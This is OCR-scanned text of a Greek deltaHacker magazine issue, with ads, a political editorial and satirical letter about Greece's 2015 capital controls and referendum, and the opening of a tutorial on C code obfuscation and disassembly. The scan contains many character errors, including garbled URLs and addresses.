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Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


To ηλεκτρονικό περιοδικό deltaHacker είναι συνδρομητικό και εκδίδεται апо την Parabing Creations δώδεκα φορές το χρόνο, 
κάθε μήνα. H Parabing Creations έχει την έδρα της στην Καλαμαριά Θεσσαλονίκης. Ο δικτυακός τόπος του περιοδικού εἰναι στο 
http;//deltahacker.gr. Το email επικοινωνίας είναι ro talk2us(gdeltahacker.gr και ειδικά για τις συνδρομές είναι το subscriptions(odeltehacker.gr. Οι γενικές 
πληροφορίες για τις συνδρομές παρατίθενται στο hitp://deltahacker.gr/pdf120rder και апо την ἴδια σελίδα γίνονται οι παραγγελίες συνδρομών. 


Αυτό To Mac mini είναι σχεδιασμένο ώστε να κάνει ότι θέλετε - 
και πολλά περισσότερα. 


Αυτό ro Mac mini δεν &tvat ro βασικό μοντέλο, και κοστίζει 1249 ευρώ 
(http://store.istorm.gr/mac/mac-mini/2-8ghz-mac-mini.html). 


Αυτό ro Mac mini то κληρώνουμε μεταξύ 25 αναγνωστών ue Jumbo- 
Pack Plus (60 τεύχη). 


Αν η συνδρομή σας πλησιάζει στη λήξη της, αυτό ro Mac mini εἶναι 
εξαιρετικά πιθανό να γίνει δικό σας. 


fia va πάρετε µέρος στην κλήρωση, αρκεί va πάρετε κι εσείς Jumbo- 
Pack Plus συμπληρώνοντας κατάλληλα τη φόρμα παραγγελίας ото 
http://deltahacker.gr/pdf120rder/ss2. 


Από την ἴδια τη φόρμα παραγγελίας βλέπετε πόσους αναγνώστες 
µε Jumbo-Pack Plus χρειαζόμαστε ακόµα, ώστε να προχωρήσουμε 
στην κλήρωση. 


Προσέξτε: Av και θα περιμένουμε όσο χρειαστεί για να έχουµε 25 
συνδρομητές µε Jumbo-Pack Plus και να τους κληρώσουµε ro Мас 
mini, αυτό δεν σημαίνει ότι δεν μπορούμε να κάνουμε κάτι για va επι- 
σπεύσουµε τη διαδικασία. Κάντε αυτό που πρέπει, συμπληρώνοντας 
τη φόρμα παραγγελίας: http://deltahacker.gr/pdf120rder/sts2 


Καλή σας επιτυχία! 
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Το τέρας είναι εδώ 


του Χρήστου Βαρελά 


Φίλες και φίλοι, 


"Αυτή εἰναι µία από rtc φορές που τα bullets στο κείµενο µε βοηθούν να βάζω τις σκέψεις µου 
σε σειρά. 


* Σήµερα μάλιστα αισθάνομαι εντονότερα την ανάγκη για οργάνωση. 


* Έχω γράψει αρκετές εκδοχές του παρόντος κειµένου κι αυτή που διαβάζετε είναι της 30ης 
Ιουνίου, ώρας βραδινής. 


* (Μη σας μπερδεύει η ηµεροµηνία του post, στο σάιτ rou deltaHacker: Н ανακολουθία μεταξύ 
ημερομηνίας δημοσίευσης και περιγραφόµενων γεγονότων εἶναι µια άλλη, αδιάφορη ιστορι- 
ούλα που αφορά στην κυκλοφορίατου περιοδικού) 


* Ζούμε, αγαπητές κι αγαπητοί, μοναδικές στιγμές. Ασχέτως της πλευράς από την οποία Ká- 
ποιος παρακολουθεί -Kı ερµηνεύει- τα γεγονότα και τις εξελίξεις, θα συμφωνήσετε φαντά- 
ζομαι πως όλοι εἰμαστε κάπως ανήσυχοι, φορτισμένοι — πιθανώς κι εκνευρισμένοι. 


+ Όλη αυτή η αναστάτωση δεν είναι ἐκδηλη µόνο στα social τα media στα οποία, παρεμπιπτό- 
VTWG, πολλοί εξ ημών μάλλον ξοδεύουµε περισσότερο χρόνο art όσο θα έπρεπε. 


* Н ίδια αναστάτωση είναι φανερή και στον πραγµατικό κόσμο. 


"Χθες то πρωΐ, για παράδειγµα, πρώτη pépa εφαρμογής των συναρπαστικών capital controls 
στον κατά τα άλλα амаро µας βίο, καθόμουν o' ένα παγκάκι στον πεζόδρομο της Καλαμαριάς. 
Απολάμβανα τη δροσιά -για κάποιον ευχάριστο λόγο το καλοκαίρι διστάζει να µας επιτεθεί 
φέτος-, και προσπαθούσανα φανταστώ πώς θα εξελιχθούν τα πράγματα μετάτην αναγγελία 
του δημοψηφίσματος. Την ἰδια στιγµή, σε ένα άλλο νοητικό thread έτρεχαν σκέψεις για τις 
δουλειές που απέµεναν για το νέο τεύχος, όπως, π.χ. η συγγραφή του πονήµατος που τώρα 
διαβάζετε. 


"Ξαφνικά, την προσοχή uou τράβηξε το θέαμα µιας κυρίας που µε περιττά µεγάλες δρασκελιές 
κατέβαινε τον πεζόδρομο. Μόλις είχε σταθεί ἐξω από το υποκατάστημα της Εθνικής και, με 
ζωηρό τόνο στη φωνήτης, εξηγούσε о έναν συνταξιούχο ότι σήµεραη τράπεζα δεν Ө' ανοίξει. 
"Ακούστε με, ακούστε µε, апо αύριο θα υπάρχουν τράπεζες ανοικτές για να παίρνετε τις OU- 
ντάξεις σας", του εἰπε κι έκανε να συνεχίσει στο δρόμο της. Αλλά δεν πρόλαβε να πάει πολύ 
πιο κάτω. 


* Хе ша καφετέρια παραδίπλα, évag παππούς κάτι της εἰπε. Δεν τον άκουσα, αλλά άκουσα πε- 
ντακάθαρα εκείνη: "Εμένα o παππούς µου πολέμησε γιαναδιώξειτους Γερμανούς! Δενπρέπει 
να φοβόμαστε, θα καταφέρουμε να τους διώξουμε και пали" Την ίδια στιγμή, μία γιαγιά που 
επίσης κατέβαινε τον πεζόδρομο κι άκουσε τη στιχομυθία, κοντοστάθηκε και κούνησε το δεξί 
της χέρι κυκλικά, στο OTLA "Tt µας λες τώρα, εδώ падаре μεγάλη συμφορά". 


* Αμέσως η κυρία γύρισε προς το µέρος της για να την κατσαδιάσει — στοργικά: "Κοιτάξτε, όλα 
θα πάνε καλά, η Ελλάδα ποτέ δεν πεθαίνει!" 


* Πα TO ένα περίπου λεπτό που έμεινα εκεί, στο παγκάκι, η συζήτηση συνεχιζόταν. Μπορούσα 
ν' ακούω μόνο τη ζωηρή κυρία, καθώς προσπαθούσε v' αναπτερώσει το ηθικό του παππού 
και της γιαγιάς. Λεπτομέρειες δεν θυμάμαι, αλλά η βασική ιδέα ήταν πως τώρα θαπρέπεινα 
φανούν γενναίοι και σύντομα όλα θα είναι όπως πρέπει και πολύ καλύτερα. 
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* Καθώς επέστρεφα στο γραφείο και στις υποχρεώσεις, για µια στιγµή σκέφτηκα ότι μάλλον η 
κυρία ήταν περισσότερο φοβισμένη από τον παππού και τη γιαγιά. 


* Μπορεί βέβαια να έκανα λάθος. 


* Στο γραφείο, µη νομίσετε ότι μπόρεσα va στρωθώ στη δουλειά. Από χθες έως και τούτη τη 
στιγμή, κάθε λίγο και λιγάκι επιστρέφω oro Twitter και oro Facebook για va μαθαίνω κανένα 
νέο, va παρακολουθώ συζητήσεις και, τ' ομολογώ, για να τρολλάρω κιόλας (τέτοιος είμαι Ῥ) 


* Κατά ra αναμενόμενα, κάργα οι νουθεσίες ora social ra media, то ίδιο και η -συχνά κεκαλυμ- 
μένη- ανησυχία. Υπερωρίες βεβαίως κάνουν kat ot επαναστάτες του πληκτρολογίου, ra κομ- 
ματομαντρόσκυλα kat ra περίπολατων χωροφυλάκων της σκέψης. 


* A, κιεννοείται ότι σχεδόν όλοι γνωρίζουν σχεδόν та πάντα για σχεδόν οτιδήποτε. 
* Ξέρουν, π.χ. TL Oa έπρεπε va κάνειο Πρωθυπουργόςγιαναµη φτάσουμε έως ro δημοψήφισμα. 


* Κατανοούν γιατί, παρά τις φιλότιµες και αξιέπαινες προσπάθειες του Πρωθυπουργού, τελικά 
φτάσαμε έως το δημοψήφισμα. 


* Προβλέπουν το αποτέλεσµα rou δημοψηφίσματος και είναι βέβαιοι για το τι θα ακολουθήσει. 


* (Παρεμπιπτόντως, av µετά το περήφανο Όχι η κυβέρνηση δεν μπορέσει να συνεχίσει, θα την 
έχουν ρίξει.) 


* Na σημειώσουμε κάπου εδώ ότι µια χαρά όμορφα περνούσαμε µε την παλιά Δραχμή. Με τη 
νέα Δραχμή θα πάρουμε τη χώρα µας πίσω και, as a bonus, θα περνάμε και πάλι µια χαρά 
όμορφα. 

* Στο μεταξύ, οι ξένοι τρέχουν πανικόβλητοι u' αυτή την κίνηση-µατ του Πρωθυπουργού κι o 
καπιταλισμός καταρρέει. 

* Tu OX; 

* Xu, Óxt. 

* (Who da thunk it?!) 

* ΣΕ άλλο μέτωπο, μπράβο 2ш{тса, πες тоос ra kat ξεγύμνωσέ τους! 

* Νέες γέφυρες ρίχνει προς τους Ευρωπαίους ο Πρωθυπουργός και επιδιώκει συμφέρουσα 
συμφωνία στο "kat ένα”. 

* Tnv ίδια στιγμή, το χρέος έχει κριθεί ως παράνομο και επονείδιστο. 

* Μπράβο Ζωίτσα, πες τα! 

* Πέρα από την πλάκα, ξέρετε γιατί ra γράφω αυτά, έτσι δεν είναι; Av δεν ξέρετε, να σας то по) 
εγώ: Пат! δεν sipat αριστερός enough. 


* Ἦρθε χθες ένας στο προφίλ µου ото Facebook ue ro αριστερόµετρο, µε μέτρησε, µε βρήκε KO- 
уто, µου θύμισε ότι παλιά τα έχωνα στο Σαμαρά αλλά τώρα άλλαξα, µε ρώτησε τι Ва έπρεπε 
να κάνει ο Τσίπρας για va µη φτάσουμε ως εδώ --µου εξήγησε кі оті то πρόβλημα µε το bank- 
run TO προκάλεσαν οι κακοί ξένοι και τα εγχώρια media που τους σιγοντάρουν. 


* Αυτό το τελευταίο, το εξηγούν πολλοί σε πολλούς άλλους. 
* Κοιτάξτε δηλαδή τι συνέβη. 


* O κόσμος εμπιστευόταν rov Σύριζα που εδώ και μήνες κάθε βδομάδα υποσχόταν συμφωνία, 
και συμφωνία δεν βλέπαμε. 


* Εμπιστευόταν και τον Πάννη ειδικότερα (όχι, δεν πρόκειται να το γράψω µε ένα "v 
πρωί έλεγε το ένα και το μεσημέρι αμόλαγε το μείον ένα. 


), που TO 
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* Εμπιστευόταν επίσης rov Κρητίκαρο γιατρό (και πρώην απεργό πείνας µε λιγούρες), τον Φίλη 
που σε τηλεοπτική εκπομπή ρώτησε παρευρισκόµενο αν φοβάται μήπως χάσει τα 300 του 
ευρώ, τη Βαλαβάνη, τον Σκουρλέτη, τον άνετο Λαπαβίτσα, την τσεκουράτη Ραχήλ, τον Ρωσ- 
σολάγνο Λαφαζάνη κ.ά. 


* Οκόσµος δεν ανησυχούσε που n κυβέρνηση σκούπιζε ότι υπήρχε και δεν υπήρχε στα κρατικά 
ταμεία, γιανα πληρώνει δόσεις και στοιχειώδεις υποχρεώσεις όπως, π.χ. μισθούς και συντά- 
ξεις. 

* Όταν μάθαμε για ra "I Owe You" (forever), ο κόσμος συνέχισε να µην ανησυχεί. 


* Όταν ото пара πέντε και µέσα στα άγρια ξημερώματα οπρόεδρος του 15ugAo0G ανακοίνωσε 
δημοψήφισμα µε γελοίο και ταυτόχρονα εκβιαστικό ερώτημα, ο κόσμος και πάλι δεν ανησύ- 
χησε. 


* Αλλά µετά άρχισαν τα όργανα οι απέξω, υποβοηθούμενοι βεβαίως апо τα ντόπια κανάλια, 
οπότε bank-run. 


* To Оті Να 'Nat (TM), φίλες και φίλοι, etv' éva αδηφάγο τέρας. 
* Είναι εδώ και απειλεί να µας κατασπαράξει όλους. 
· Λέγανε κάποιοι ότι αυτά που υποσχόταν о Σύριζαπριν τις εκλογές απλά "δεν" γίνονται. 


* To πήγαιναν παραπέρα κι εξηγούσαν ότι ο Σύριζα θα καταστήσει τον κόσµο συνένοχο σε νέο, 
χειρότερο μνημόνιο. 


* Av και καταλάβαινα γιατί τα έλεγαν όλα αυτά (εκείνοι που τα έλεγαν), δεν ήθελα να τους TU- 
στέψω. Μωρέ, ας κάνει τα μισά -ή ακόµη και τα μισά των µισών-- απ боа λέει ο Σύριζα, και 
καλύτερα θα είμαστε όλοι µας. 


* Έτσι έλεγα τότε. 
- Σήμερα; 
* Φασκελώνομαι. 


* Κιεκείπου φασκελώνομαι, θυμάμαι κάτι που είχε γράψει ο Θείος Ακάκιος, στην επιστολή TOU 
vta TO τεύχος 011. 


* Αντιγράφω εδώ. 
“Αυτό που κυρίως θέλω va πω είναι κάτι πολύ απλό, αδυσώπητο, και απίστευτα τρομακτικό όταν TO 
συνειδητοποιείς. Είναι το εξής: 


+ Κάποια πράγματα πάνε στραβά, και κάποια бу. Αλλά αν είναι να πάνε στραβά, δεν υπάρχει κανένα όριο 
στο πόσο στραβά μπορούν να πάνε. Δεν υπάρχει καμία ασφαλιστική δικλείδα. Ούτε η κοινή λογική, ούτε 
η ωριμότητα, οὐτε η γνώση, ούτε η πληροφόρηση, ούτε η τεχνολογία, ούτε η συμπόνια των άλλων ούτε 
τίποτα. Av τα αφήσεις ανεξέλεγκτα, τα πράγματα µπορεί να πάνε πολύ στραβά. 


* Έχει συμβεί και ξανασυμβεί. Και Ва ξανασυμβεί. Αναπόφευκτα. To θέµα είναι, όσο περνάει апо το χέρι 
μας, va unv ξανασυμβεί σε µας. 
* Na ro θυμάστε αυτό, αγαπητοί µου, όταν σας ξαναπεί κάποιος ότι εντάξει, ρε παιδί µου, δεν τρέχει και 


τίποτα που έπιασαν εφτά τοις εκατό οι αβγοκέφαλοι τραμπούκοι, θλιβερό είναι αλλά εντάξει, ή ότι η 
Ευρώπη δεν πρόκειται µε τίποτα να αφήσει την Ελλάδα να καταρρεύσει. 


* Na ro θυμάστε. 


* Геро! va είµαστε, να σκεφτόμαστε ψύχραιμα και у αντιμετωπίσουμε σθεναρά ότι άλλο — 
εκτός апо το Оті Να Ναι (TM)- πρόκειται να έρθει. 
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Αγαπητοί рох, 

Νονώθω ελαφρά αμηχανία. r 

Tv ελαφρά. Νονώθω µεγάλη αμηχανία. ΄ - 

СЯ 

Από δεκαηµέρου είχα υποσχεθεί, µέσω divlovoo, να έχω ολοκληρώσει την 
επιστολή Μαΐου μέχρι το βράδυ της τελεύταίας Δευτέρας του μηνού, καν 
σήμερα που αξνώθηκα να κάτσω στη γραφομηχανή yla να σας γράφω είναι η 
τελευταία Δευτέρα TOU μηνού, XL εγώ ακόµα δεν ξέρω τι να σας γράφω. 

Να σας πω την αμαρτία µου, ἠλπιζα бт, µέχρν τώρα θα εἶχαν λυθεί ον 
διαφορές µας µε τους "εταίρους" καν τους "θεσμούς", ότι θα είχαμε πατα- 
λήξεν σε κάποια συμφωνία, 

To είχα σχεδιάσει. θα έπαιρνα τη συμφωνία, θα την ἁπλωνα στο τραπέζι 
σαν τον τραχανά πον ανοίγει η Κυρία Καίτη, και θα κατέγραφα σχόλια καν 
αντιδράσεις. 

Δεν έχεν σημασία τι είδους θα ήταν τα σχόλια ή ον αντιδράσεις. Οτι- 
δήποτε. Πανάνες ενθουσιασμού. Χανρέκακη ειρωνεία. Εθνική περηφάνενα. 
Διστακτική συγκατάβαση. Πικρό χαμόγελο. Βυλυκρυνῆς μεταμέλευα. Σφίξυμο 
δοντνών. Δεν ξέρω. Κάτι. Οτιδήποτε. 

Φρούδες ον ελπίδες, αγαπητοί μου. 

Н διαπραγμάτευση συνεχίζεται. Εθνική περηφάνενα. Κόκκινες γραμμές. 
Νωπή εντολή. 

Kv εμείς, αμήχανου, κοντάµε σα χάνον. 

Αναρωτιόµαστε. Н μάλλον δεν αναρωτιόµαστε καθόλου. Ξέρουμε. 

Είχα πάεν προχτές στην Έβγα του Κυρίου Κώστα καν μου τα εξήγησαν 
όλα. Με το νν και µε το σίγμα: Βασικά, το πρόβλημά µας εἶναι o Σόνμπλε. 
Όλον ον ἄλλον συζητιούνται, δεν εἶναι εχθροί µας, τους καταφέρνουμε αν 
θέλουμε. Ακόμα καν τη Μέρκελ. Μόνο ο Σόνμπλε να µην υπήρχε. Αυτός φταί- 
εν. K&tv ЕХЕ, εναντίον µας. Μας ζηλεύει. 

Αγαπητοί µου, χαμογελάτε, είμαι σίγουρος. Αλλά η ομοφωνία των θαμώ- 
νων της Έβγας του Κυρίου Κώστα δεν αποτελεί εξαίρεση. Είναι ο κανόνας. 

Προσωπικώς δεν µε εκπλήσσει βέβαια, γιατί Xv εγώ εδώ μένω. Έχω συ- 
νηθίσει. Έχω πάθεν μιθριδατισµὀ. Όση εγρήγορση καν να την έχω, κάπονα 
στιγµή την πατάω. Πέφτω κι εγώ όπως όλον µας στην ἰδια παγίδα. 

Ποια παγίδα; Την παγίδα της συλλογιστικής ανεπάρκειας, ποια άλλη; 

Όχν, ποντάχτε. Πέρα από πλάκα τώρα, το ζήτημα που έχουµε µπροστά 
µας είναν πολύπλοκο, καν δεν έχει να κάνει µε το πονος πιστεύει τι. Αν ήταν 
θέµα απόφεων θα συμφωνούσαμε πως διαφωνούμε, καν όλον θα ήμασταν ευ- 
χαριστημµένον. 

To ζήτημα έχει να κάνει µε το πώς σκεφτόμαστε. 

Ἐπιτρέφτε µου, αγαπητοί рох, να εξετάσω απὀ κοντά ένα παράδειγµα 
απὀ την ειδησεογραφία των τελευταίων ηµερών. 


Σνέιλ μέιλ 


Ακούω τις προάλλες τις ειδήσεις. H συμφωνία είναν σχεδόν έτοιμη, ανακοινώνει o δηµοσιο- 
γράφιξ (sic), αλλά το ANT διαφωνεί, σήκωσε μπαϊράχι καν δεν θέλει να συναινέσει. Εμπλοχή της 
τελευταίας στιγμής. "Βόμβα ANT." 


Από κοντά. καν ο Σόνμπλε, συνεχίζεν ο δημοσιογράφιξ, κρύβεται πίσω ало το ANT και µας κάνεν 
τη ζωή δύσκολη. "Βρείτε τα", µας λέεν ενρωνικά. 

Βαφνικά όλον εἶναι εναντίον µας. Αλλά, µας καθησυχάζεν ο δημοσιογράφιξ, ο Αλέξης σκοπεύεν 
να πάρεν τηλέφωνο τους Αμερικανούς. Ta μεγάλα αφεντικά όλων. (Καν του ANT.) Εξοπλισµένος µε 
τη νωπή εντολή καν το καθαρό κούτελο θα τους πεν να παρέμβουν για να βγούμε από το αδιέξο- 
δο. 


Тоос παίρνει. Ον Αμερικανοί τον ακούν προσεκτικά. Ναι, βέβαια, συμφωνούν. "Είναι προς то 
καλό όλων να φτάσουμε σε συμφωνία το ταχύτερο. Ги αυτό καν πρέπει να τα βρείτε." 

Τρύπα στο νερό. Πώς να τα βρούμε αφού δεν μπορούμε να τα βρούμε: 

Ας δούμε τα πράγµατα από πιο κοντά. Τα δεδομένα εἶναι αυτά. О δηµμοσιογράφιξ δεν φεύδε- 
ταν, τουλάχιστον δεν έχει τέτοια πρόθεση. Νομίζει πως βλέπει τα πράγματα καθαρά, he has the 
big picture: Ον "θεσμοί" θέλουν να συμφωνήσουν αλλά ένας алб αυτούς, το ANT, έχεν διαφωνίες. 
Πετάγεταν xv ο Σόνμπλε, αρπάζει την ευκαιρία, χι αρχίζει τα δικά του, πως αν δεν συναινέσεν το 
ANT, συμφωνία Yvox. O καημένος o Αλέξης, κοτζάμ νωπή εντολή, αναγκάζεται να κάνει την ανάγκη 
φιλοτιμία καν αρχίζει να παρακαλάεν τους Αμερικανούς. Εκείνον το παίζουν ήξεις αφήξευς. 


Σκληρή διαπραγμάτευση. Εθνική περηφάνεια. Κόχκυνες γραμμές. Νωπή εντολή. 

To πρόβλημα, βέβαια, είναν πως ένα πρίσιµο κομμάτι του παζλ παραμένειν εντός συζητήσεως, 

O δημοσιογράφιξ τα εξηγεί όλα, αλλά δεν µας λέεν žyrati* σήκωσε µπαϊράκν το ANT. Ίσως δεν το 
γνωρίζει καν. Ὑποθέτεν κάτι, κι αρχίζεν τα υπονοούμενα. Μας αφήνει να σκεφτούμε πως το ANT 
τα έχεν κάνει τσανάκια µε τον Σόνμπλε και τη βρίσκει να µας κάνει τη ζωή δύσκολη. Δεν το λέει 
αυτό σαφώς, ο δηµοσιογράφιξ, το υπονοεί. To επιβεβαιώνει τεχνηέντως µε τον τρόπο που εισάγεν 
την παράμετρο "Σόνμπλε". 

To πρόβλημα είναι πως ο συλλογισμός του δημοσιογράφιξ εἶναι σχηµατικός καν προὐπήρχε στο 
μναλό του. Δεν προκύπτει από τα δεδοµένα. Ωστόσο ο δηµοσνογράφιξ νομίζει πως τα δεδοµένα 
τον "επιβεβαιώνουν", καν ετοιµάζεν το ρεπορτάζ τον. Είναι αποκαλυπτικὀ, µε δραματική μουσική 
υπόκρουση. Λέξεις σκληρές. Σαν τα σφυριά. 


"Βόμβα ANT. Αδύνατη η Συμφωνία. Ειρωνείες Σόνμπλεε 'Βρείτε τα'. Παρέμβαση ΗΠΑ." 
Ἰδού η εθνική µας αφήγηση. Εμείς ον αθώου, καν για PLAV ακόµα φορά ον κακοί ον ξένου που 
µας προδίδουν. 


Καν κανείς δεν κάνει τον κόπο να σκεφτεί λιγουλάκι παραπάνω YL αυτό το κομματάκι TOU παζλ 
που λείπεν. 


Αν το ANT αποφάσισε να μουλαρώσει, θα έχει μάλλον τους λόγους του. Σωστά: Ποιον να είναι 
αυτοί ον λόγον; Ξέρουμε: Εγώ δεν ξέρω. Ούτε εσύ. Ούτε ο δημοσνογράφυξ. Κανείς µας 
δεν ξέρει. 

Tv κάνουμε, λουπόν: 

Ανοίγουμε το γκουγλλ. 

To ανοίγουμε καν βλέπουμε 
το εξής ενδιαφέρον: 

Είναι θέµα καταστατικού. TO 
καταστατικό του ANT 65у του 
επντρέπεν να συνεχίσει να dvp- 
µετέχεν σε μια συζήτηση үс. το 
πρόγραμμα βοηθείας µας χώρας, 
αν υπάρχουν αμφιβολίες για την 
βιωσιμότητα του χρέους της χώ- 
ρας αυτής. 

Αχά. That makes sense. 

Καθώς δεν έχω, ακόµα, πρό- 
σβαση στο κινητό του πυρίου 


WV'HAGIKER 


Ὑπουργού, бло είναν όλα καταγεγραμμένα, επιτρέφτε µου, αγαπητοί µου, 
να επιστρατεύσω τη φαντασία μον. O δάλογος έγινε ως εξής. 

To ANT έχει αμφιβολίες yra τη βιωσιμότητα του χρέους της Ελλάδας. Λέει 
λοιπόν στους άλλονς (τους θεσμούς ντε!): "Н διαγράφετε το χρέος της Ελ- 
λάδας ἡ εγώ φεύγω." 

"Μα πώς να το διαγράφουμε", τον λένε αυτοί. "Еу µέσω αξιολόγησης; Δεν 
γίνεται. θα µας κόφουν τα αφτιά ον δικοί µας." 


"Μα, ον Έλληνες δεν δέχονταν την αξιολόγηση. Δεν δεσμεύονται απὀ τις 
καταστροφικές συμφωνίες των προηγουμένων, λένε." 

"Πράγματι, έτσι λένε. Οπότε συζήτηση για διαγραφή δεν µπορεί να γίνει 
τώρα. Δεν θα περάσει. Αφού τα βρούμε, xv αν." 

"OK, τότε. Αν είναν έτσι, εγώ να φεύγω", αρχίζει πάλιν το ANT. "Δεν έχω 
μέλλον. Αλλά θα θυμάστε βέβαια πως αν φύγω θα πρέπειν να µου αναπληρω- 
θούν αυτά που έχω ἤδη δώσει. Αυτό λέεν το καταστατικό μον. Ταμείο εἶμαι, 
όχν АТМ." 

"Ναι, θυμόμαστε." 

"Ωραία. Λοιπόν, ποιος θα ξηλωθείς" 

"Tv εννοείς, ποιος θα ζηλωθεί Κανείς δεν θα ξηλωθεί. Κοίτα, Χριστυνάκν, 
φύγε εσύ, µνα που θέλεις να φύγεις, καν τα βρίσκουμε αργότερα." 

"Παιδιά δεν γίνεται αυτό", επυµένει το Χριστινάνν (ANT), "το ξέρετε. Δεν 
μπορώ να φύγω καν να μου χρωστάνε λεφτά. Δεν θα κλείνουν τα βιβλία µου. 
θα πρέπει να γράφω ÓTL η χώρα χρεωκόπησε. Αυτό να κάνωσ" 

"Ωχ ωχ", αγχώνονταν ον άλλον. "OXL καν χρεωκοπία βρε Χριστυνάκν, τόσο 
κόπο έχουµε κάνει να την αποφύγουμε. Μη λες Yla χρεωκοπία, να σε χαρώ, 
γνατί θα µας πάρεν όλους καν θα µας σηκώσει. Питере." 


"Εντάξει παιδιά. Όχν χρεωκοπία. ΟΚ. Αλλά, τότε δεν γίνεται να φύγω. То 
καταστατικό µου µε υποχρεώνει να μείνω." 


"OK. Μη φεύγεις. Κάτσε κάτω. Λοιπόν. Πού εἴχαμε μείνεισ" 


"Είχαμε μείνεν", ξαναρχίζεν το Χριστυνάκι, "εκεί που σας έλεγα ÓTU το 
χρέος της Ελλάδας είναι µη βνώσυμο. Ау δεν θέλετε να το διαγράφετε, xv 
εφόσον δεν θέλετε να φύγω, κάτι πρέπει να κάνουμε. Δεν ξέρω πώς θα το 
πάρουν εκεί στην Ἑλλάδα, αλλά κάπως πρέπει να γίνει για να αυξήσουν τα 
έσοδα. Αλλιώς δε βγαίνει." 


То. μαθαίνει αυτά. ο δημοσιογράφιζ, ετοιμάζει αποκαλυπτινκὀ ρεπορτάζ. 
Επισημάνσεις καΐρνες. Λέξεις σκληρές. Σαν τα σφυριά. 


"Βόμβα ANT στις διαπραγματεύσεις. Λαγκάρντ: 'Απαραίτητα νέα μέτρα'. 
Ῥόνμπλε: 'Βρείτε τα µε τους θεσμούς'. Κυβέρνηση: Ἔχουμε νωπή εντολή καν 
σαφείς πόχκινες γραμμές.'" 


Καν να 'µαστε πάλι εκεί απὀ όπου ζεκινήσαμε. 


Ῥθνική περηφάνεια. Σχληρές διαπραγματεύσεις. Κόκκινες γραμμές. Νωπή 
Εντολή. 


Καν πυρίως: Κοφτερή δημοσιογραφία. 


θα nov πείτε, ο δηµμοσιογράφιξ φταίει ἡ αυτοί που τον ακούνε (καν τον 
πληρώνουν)» 


Έλα µου, ντε. E κότα και το αβγό. 
Σας ασπάζομαν, 
θείος Ακάκιος 


σνένὰ μενα 
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DigitalOcean 


Ταχύτατα VPSes στο cloud, σε hosts µε δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Αμεριµή μαι Ασία. 
Lean-mean control panel, για απόῆυτο éneyxo. 


Αποητήστε τώρα το δικό oas VPS, 

στο cloud της DigitalOcean. 

Κάντε KAIK oto http://bit.ly/digocean10off 
ка! µερδίστε αυτομάτως 105 oe credit. 


Hint: Επιβέγοντας το шкрб πϑάνο, 

πάντα µε KAIK στο http://bit.ly/digocean10off, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για ένα VPS 
pe 512MB RAM, 20GB SSD ка! 1TB transfer. 


mH Δεν είναι RI ἄσχημα 


Skill: Advanced 
Tags: disassembly, code obfuscation, reverse engineering, malware analysis, anti-reversing 


Code obfuscation 
στη VÀoo)00a C 


[μέρος 1] 


Οι δημιουργοί κακόβουλων προγραμμάτων και οι εταιρείες ανάπτυξης 
λογισμικού έχουν ένα κοινό: Θέλουν να γράφουν επιτηδευµένα περίπλοκο 
κώδικα, ώστε να δυσκολεύουν τη ζωή των αναλυτών. Σε αυτή τη σειρά άρθρων 
θα μελετήσουμε ορισμένες τεχνικές που αξιοποιούνται 
ακριβώς yt αυτό το σκοπό. 


από τον Αναστάσιο Μαγειρία 


Οιτεχνικές συσκότισης κώδικα (code obfuscation techniques) είναι ιδιαίτερα διαδε- 
δομένες στη γλὠσσα C και χρησιμοποιούνται κατά коро στην ανάπτυξη κακόβουλου 
λογισμικού. Οι δημιουργοί αυτών των προγραμμάτων θέλουν να δυσκολέψουν την 
ανάλυση του κὠδικά τους, πάση θυσία. To ίδιο επιδιώκουν και οι εταιρείες λογισµι- 
κού, που θέλουν να δυσκολέψουν το reversing και, τελικά, το παράνομο ξεκλείδω- 
ра των προγραμμάτων τους. Σε αυτή τη σειρά άρθρων θα μελετήσουμε ορισμένες 
апо τις τεχνικές συσκότισης, καθώς και τη γενικότερη διαδικασία ανάλυσης ενός 
προγράµµατος. Όπως αντιλαμβάνεστε, éva τόσο σύνθετο θέµα δεν θέλει βιασύνες. 
Αντιθέτως, απαιτείται µελέτη και υπομονή. 2' αυτό το τεύχος εξοικειωνόµαστε [IE 
την έννοια του disassembly κι εξετάζουμε δύο διαφορετικές προσεγγίσεις για την 
επίτευξή του. Επιπρόσθετα, θα κατασκευάσουµε ένα μικρό πρόγραµµα το οποίο θα 
χρησιμοποιήσουμε ως "пераратосшо" για την επίδειξη όσων θα παρουσιάσουμε 
θεωρητικά. Αν θέλετε να ακολουθήσετε τα βήματά µας, εἶναι απαραίτητη προῦ- 
πόθεση να έχετε κάποιο μηχάνημα µε λειτουργικό σύστημα τύπου Unix (ΣΤΕ. Ένα 
Linuxákt αρκεί :Р). Καθίστε αναπαυτικά μπροστά oro laptop ή στον υπολογιστή κι ας 
ξεκινήσουμε. 


Από binary σε Assembly 


Αρχικά πρέπει να εξηγήσουμε τι περιλαμβάνει η διαδικασία που ονομάζεται 
disassembly, rt рас προσφέρει και γιατί είναι χρήσιμη κατάτην ανάλυση rou malware. 
Ως γνωστόν, για va φτάσουμε από τον πηγαίο κὠδικα (source code) σε ένα εκτελέσι- 
ро αρχείο διαµεσολαβεί o compiler. Κι επειδή εμείς θα ασχοληθούμε µε τη γλὠσσα 
C, η δημοφιλέστερη επιλογή compiler για όσους χρησιμοποιούν Linux είναι ο GCC. 
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Code obfuscation στη γλὠσσα C [μέρος 1] 


Source code 


preprocess p < 
stage e 
(gcc -E) ΄ 


compilation 


stage Р, 
(gcc -S) 


~ 


assembly 
stage 
μες ο 


assembly 
code 


PAT 


- 


linking ` 
stage 

disassembly 
procedure 


binary executable 


(elf-32bit) 


Καταλαβαίνουµε όλοι ότι η δουλειά ενός compiler είναι σύνθετη, ίσως όµως δεν 
γνωρίζουμε ra στάδια “παρασκευής” апо τα οποία διέρχεται ένα µεταγλωττιζόµενο 
πρόγραμμα. Έχετε εξάλλου κατά νου ότι το disassembly, av και αποτελεί πολύτιμη 
τεχνική, δεν προσεγγίζει ούτε κατά διάνοια τον πηγαίο κώδικα. 


(Па όσους προτιμούν ro BSD, εἶναι ο clang.) H διαδικασία για την παραγωγή ενός 
εκτελέσιµου αρχείου (8/32 ñ elf64) περιλαμβάνει τέσσερα στάδια: preprocessing, 
compilation, Assembly και linking. Σημειώστε μάλιστα ὁτι ο 600 επιτρέπει να διακό- 
youue τη διαδικασία της µεταγλώττισης σε οποιαδήποτε φάση. 


